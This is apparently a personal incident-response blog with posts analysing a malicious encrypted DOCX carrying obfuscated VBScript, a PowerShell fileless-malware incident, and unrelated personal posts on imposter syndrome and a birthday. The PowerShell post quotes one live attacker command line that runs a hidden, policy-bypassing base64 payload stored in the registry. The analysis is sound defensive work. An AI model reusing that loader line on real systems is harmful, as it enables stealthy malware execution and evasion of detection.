Monday, April 24, 2017

More Malicious Docs, Oh My!

Introduction

Ok, I know malicous documents, specifically .DOC, so how is this one different?  Well, we will get to that in a bit.  I wrote this posting as more of an introduction to Visual Basic script deobfuscation and hope others might find it useful/interesting.

Initial Detections

It all started with many users reporting suspicious emails.  These emails were a little different from the usual "Open this email and enable macros to view the content".  

First, these emails contained a .DOCX rather than the older .DOC or a .DOCM.  Ok, that is odd. 

Secondly, they were encrypted.  The email they were attached to, gave instructions on how to open the email with the password.



Initial Analysis

So the first thing done, is to see what VirusTotal and Hybrid-Analysis have on this encrypted document.  Let's see....

Not starting so good....

Maybe Hybrid has more....

Ok.  So nothing much from any of the usual online sources....  To doublecheck, lets try some of our commandline tools.


So, it is a valid OLE document, however has no macros to speak of.  One issue I noticed, is that OLEID states that the file is not encrypted and not a Word document.  I will follow up on this in the near future.

Decrypting DOCX

So lets see about getting something useful outta this...  To do this, it was quite easy.  I could have used MS Word, however to be a bit safer, lets use LibreOffice....

First, we are presented with this


Ok, once the (correct) password is entered, we finally see the true document....


Interesting.  Seems the document has 3 embedded objects.  We will work on those in a bit.  First, lets see what our tools say about the document NOW!



Ok, now that looks ALOT more malicious.  So far so good I would say.  What more can we tell though?  Those embedded OLE objects look very suspicious.  Lets check it out...


OLEVBA states there is no macro.  Ok, so not using macros...  Lets see what other tools we have will tell us....


Ok, OLEDUMP tells us a bit more.  Three objects embedded.  And they all seem to have the same sizes.  Lets extract them and run a cryptographic hash to see if they are indeed the same....


So they ARE all the same.  Cool.  Lets look at what we got

So looks like standard Visual Basic Script, although obfuscated.  Ok, so now here is where the fun begins....

Visual Basic Deobfuscation

First thing I decided to do, was load the script up in Notepad++ and turn on syntax highlighting

I find syntax highlighting helps alot.  So first thing I like to do, is to start cleaning up the silly cAmElCaSe I see in the document (a simple find/replace works nicely), and put some extra whitespace between all of the functions and subroutines...


Ok, that is a bit better.  First thing I notice, is the use of mathematical functions.  Most likely it is used to represent simple numbers.  Lets go and take care of all of those....


The KyVrqqM function being called here looks ALOT like some sort of decryption routine.  Will look at this in a bit.  

Another thing I noticed while doing the original deobfuscation, is that there appears to be a bunch of junk instructions.


This pattern repeats (with different variables and data) over and over and over again.  When examining the variables, they are only used within these three lines.  Which means they are essentially a "Do Nothing" collection of instructions.  Lets delete them and see what that does to the size of our script...

WOW, doing just that, the file has gone from 464 lines, to just 170.    This also revealed some other 'complication' techniques, like using a function to call a single function.  We can simplify that further...


Lets see where OgkD is called, and convert it into a simple Mid itself (there are a few different functions that do this, including one for Asc, and Chr).  Lets do them all and see what happens...

Down to 158 lines. So fewer gains but still, lets continue!  Next I look for variables that are set but next used (a simple find or count should indicate it is safe to delete.  Then I look for variables that are set to a static piece of data and then used elsewhere (non-mutable).  Those can be substituted with no effect.


Down to 101 lines.  That is alot of junk.  Probably more there that could be removed, but so far, looks like a job well done.  Code is much more readable and it is becoming clearer this script is meant to download something, write it to a file and do something with it.

One item that keeps coming up, over and over again, is this:


I am pretty sure this is some sort of decryption given the field "encodedtext", "key", offset1, offset2.  Lets copy these to another file along with the function....


Two extra functions had to be added in.  Looks like a mathematical one, and a possible xor script.  Lets run and see what it gives...


Now that is Interesting.  We have a couple of http strings, along with some commands designed to run DLLs....  

Downloaded Payload

Now lets try to download those files and see what they give us...

Hmmm, the first link gives us a binary file.  The 'file' command only lists it as 'data'  Not very useful.  What about the second file?  Well that was time wasted.  Unable to find a copy of the file at all.  So lets start on that first one.

The file shows up in VirusTotal interestingly enough.  Still not a true virus, but enough people know about it to show us something.


Something smells familiar though.  My hunch is it has been xor'ed.  I see some xor like function in the Visual Basic script, but I am feeling a bit lazy.  Back to one of Didier's programs, XORSEARCH.


Ok, now that was easy.  Lets see if we can find 73 anywhere in our script?  No dice....  Oh but wait, convert from hex to decimal gives us 115.  Lets look that up....  BINGO!


Looking at that last line, I noticed that the YS function appears to be that same one that looked like an XOR function.  Guess I was right.  XORed given ascii representation of Xb808 with 115 being the decimal key.


So, lets XOR this file and see what pops out on the other end.  For this I will use Didier's tools again (xorsearch -p -s xoredfile.bin)



So this finally gives us our DLL!  So lets look at what VT has to say about it....


So definitely a naughty little program.  I will end it here as my DLL reversing is not yet up to where I want to post publicly about it  :)  Hopefully later...  Hope you enjoyed!

Shout Outs

Here I want to put in a few links and shout outs to places, and tools that I have used and helped me out through my work here.
I was asked on a mailing list of mine to put in some more text.  Well this might not be what he wanted, but thought I would upload a little ugly sed sled (you will see why) to help with the camel case and break things apart a little....

sed 's/function/Function/Ig' | sed 's/set/Set/Ig' | sed 's/end/End/Ig' | sed 's/if/If/Ig' | sed 's/do/Do/Ig' | sed 's/and/And/Ig' | sed 's/write/Write/Ig' | sed 's/read/Read/Ig' | sed 's/responsebody/ResponseBody/Ig' | sed 's/then/Then/Ig' | sed 's/else/Else/Ig' | sed 's/dim/Dim/Ig' | sed 's/sub/Sub/Ig' | sed 's/create/Create/Ig' | sed 's/object/Object/Ig' | sed 's/textfile/TextFile/Ig' | sed 's/environment/Environment/Ig' | sed 's/get/Get/Ig' | sed 's/asc/Asc/Ig' | sed 's/chr/Chr/Ig' | sed 's/mid/Mid/Ig' | sed 's/error/Error/Ig' | sed 's/true/True/Ig' | sed 's/status/Status/Ig' | sed 's/resume/Resume/Ig' | sed 's/send/Send/Ig' | sed 's/open/Open/Ig' | sed 's/next/Next/Ig' | sed 's/for/For/Ig' | sed 's/ to / To /Ig' | sed 's/type/Type/Ig' | sed 's/savetofile/SaveToFile/Ig' | sed 's/close/Close/Ig' | sed 's/loop/Loop/Ig' | sed 's/err.number/Err.Number/Ig' | sed 's/until/Until/Ig' | sed 's/End Function/End Function\n/g' | sed 's/End Sub/End Sub\n/g'
Posted by at No comments:

Friday, March 17, 2017

I'm Not Worthy

This post started as a realization. 

I realized that perhaps a part of my personality had sabotaged itself.  Ok, let's turn the clock back a bit and describe the scenario.



About a year ago, I was doing well, and felt pretty successful.  However, something was missing.  Or perhaps I felt I was missing out on opportunities to further myself.  It's a common issue in the IT security field.  We want more...  Either more money, more responsibility, more knowledge, or even the ability to help out more people.  I just felt I needed something.

I saw a position opening at a major company that looked like it would have fit the bill perfectly.  It was at a well know and liked company, doing security (incident response and forensics), and with the benefit of helping tons of people all over the world. It would mean learning some new skills (extra win for me) and would get my name out there (rock star here I come!).  So, why not apply?  Of course I did.  This is where the issues started.

First, this was a major internet services and software company, so I figured there was no way they would want me.  I was sure there would be someone better, even though I know I am good at what I do.  No worries then right?

Not so fast, they called me back.  "WOW", I thought.  Maybe they really would like me.  I did a telephone interview and had a blast.  I have always been good at talking with people, especially when it comes to areas I love so much.  But this was JUST a telephone interview...  I have had tons of those before.  No worries again right?

Then suddenly, I receive a telephone call stating they were interested in bringing me in for an in-person interview.  WTF?!?!  I mean they wanted to FLY me down to California to meet up with them.  Ok, this was indeed getting serious.  But I thought, I am cool, I can do this.

By the time my flight arrived, I had already convinced my wife that this would be a good thing.  I would continue to keep working from home, but for this awesome company.  Can I do it?  Yes I can!

The interview came, and that is when the real trouble started.  No, I did not blow it.  Quite the opposite, I did very well.  Apparently I not only had the skills and drive, but could talk with both the technical and business side of the company.  They seemed to genuinely appreciate me and loved what I had to say.  And the team I applied with, did I mention they were SMART?  Even more so.  It blew me away.

I came away fully thinking I might get the job.  Everything was good...  Or so I thought...

I started getting second thoughts.  I mean, am I truly worthy?


I started feeling that these guys were out of my league.  I started to worry that I would not be able to contribute to a decent standard.  After all, I am not in it just for the pay cheque, I am there to both learn, and to make the world a bit better.  If I am always playing catch-up, I wouldn't feel useful and that would probably end my entire career  one way or another. 

It became so bad, that when I was offered the job, I spent a whole weekend going back and forth.  Eventually I turned it down.  I am sure I surprised them, I know I surprised myself, and even surprised my wife (who doesn't care for me changing jobs too often).  It was one of the harder decisions of my professional career.



Ok, now fast forward a bit (well, all the way back to present).  I started to reflect again on this event and started to realize a few things.  I had sabotaged myself.  Obviously I was qualified for the job, and they had truly wanted me on their team.  I remembered reading something by Dr. Barker from the UK about imposter syndrome.  http://cyber.uk/imposter/   I have turned out to be a victim of my own self-doubt and feelings of being an imposter. 

Now nothing can change the past, I know that, and accept it.  But reflection and learning about this even I feel has helped me realize some of my limitations, and facets of self that I need to change.  I know, nothing particularly ground-breaking, however as this event kept popping up in my mind, I felt a need to understand it further.  Posting this blog is part of that process.  Healing and self-understanding are very important, especially in a field as dynamic and driven as IT security.

Let me know what you think in the comments.  I am sure many of us have had such times or moments when we waivered. 

Derek
Posted by at 2 comments:

Friday, June 17, 2016

Geek Birthday

Ok, I will say it is my birthday today.  But it is the geekiest birthday of them all!  I am officially the answer to life, the universe, and everything!  Be excellent to each other!

D
Posted by at No comments:

Thursday, June 9, 2016

Powershell Empire Part 1

Let me start this post with the standard disclaimer.  All opinions found inside, are mine alone.  My employer has not paid/agreed/authorized/been informed of any of this.  With that said, onto the fun!

Introduction

This particular incident was discovered a few weeks ago at my employer while we were doing some hunting.  Below gives a rundown of what was done and how the sample was analyzed.  The most interesting part of this one, was the use of fileless malware (well almost fileless) to evade detection.

Initial Detections

Our team was looking at some new information being logged by our SCCM team.  One of the new pieces being added was a historical listing of running processes.  A quick peak into this data with one of our Red Team members showed some interesting results (Purple Teaming).  Namely Powershell running, including some rather LONG command line options.

C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\TNjWerQKhf').YRRPM)));

In addition, the machine in question was seen contacting domains which had been reported to belong to Powershell Empire.  This is getting interesting!


Powershell Registry Decoded

The script shown above loads in a registry entry under the current user profile and decodes it from base64.  

Decoded it looks ALOT more interesting....


This script appears to contain ANOTHER embedded script.  Geez guys can't you do it all in one script?!?!  Oh well, what do we have here....

Trying to decode the base64 did not reveal anything readable...  Seems the script is obfuscated somehow.  Looking at the previous script, we can see where this happens....


Ok, so maybe lets run this in the Powershell_ISE and debug it.  Putting a breakpoint after the inflatebin (ungzip) reveals the decoded script....


This looks very familiar.  A quick google search pulled up PowerSploit.  So this guy was trying to use PowerSploit eh?  But there is more to the first script...  Lets start looking down the lines....

Then there is an if-then-else statement.  A quick check of the documentation shows that it is looking at seeing what size the pointer is.  Ah, a check for 32 or 64 bit instructions. 



 The script then loads in the appropriate base64 encoded DLL and runs it through our same deobfuscator.



Lastly, this one confused me for a bit.  It is obviously attempting to do a reflective injection.  But when looking at the system, the network connections were just coming out of the powershell.exe.  Why do this?  Again, time to read the manual.  Seems the default behaviour of PowerSploit is to inject into itself.  This is to prevent writing to disk.  Ah, ok.  Still not that stealthy, but oh well.  Never give too much credit, these people ARE writing malware after all...  Last step is to set the code executing and we are off to the races.



Part 1 Ending

So far this has been exciting!  Malware which uses PowerShell to launch, and attempt to remain undetected by not writing anything (well, ALMOST nothing) to disk.  In the next section I will attempt to describe and deconstruct the actually malware (DLL).  If you have any comments (constructive feedback only), please let me know.  Fairly quick and dirty, but wanted to get thoughts written out.  

Derek
@dsplice


Edit:
When investigating this incident, several connections were noticed to PowerShell Empire's website.  So we named it internally as such.  It is not an indicator that PowerShell Empire, or the developers were involved in any way.  Just sounded like a cool name at the time!  :)
Posted by at No comments:

Monday, June 6, 2016

Introductions And A Start

Welcome to my little corner of the internet.  Not much here right now, but I wanted a place to post thoughts and investigations I found interesting.  Please be gentle, I'm a newbie...  :)

Edit:
Like to add my resume on here for anyone who would be interested in hiring this geek  :)

Resume of Derek Armstrong
Posted by at No comments:
Subscribe to: Posts (Atom)